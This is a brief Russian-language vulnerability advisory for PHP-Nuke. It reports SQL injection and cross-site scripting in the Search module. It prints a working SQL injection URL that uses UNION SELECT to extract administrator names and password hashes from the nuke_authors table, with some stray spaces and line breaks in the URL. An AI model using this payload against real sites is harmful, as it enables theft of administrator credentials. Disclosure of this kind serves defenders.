Программа: PHP-Nuke 

Несколько уязвимостей в PHP-Nuke позволяют удаленному пользователю выполнить SQL команды и XSS нападение. 

1. SQL инъекция: 

http://localhost/nuke73/modules.php?name= Search&type=comments&query=not123exist
s&instory=/**/UNION/**/SELECT/**/ 0,0,pwd,0,aid/**/FROM/** /nuke_authors

2. /modules/Search/index.php не фильтрует HTML код в поле поиска.

Оставить мнение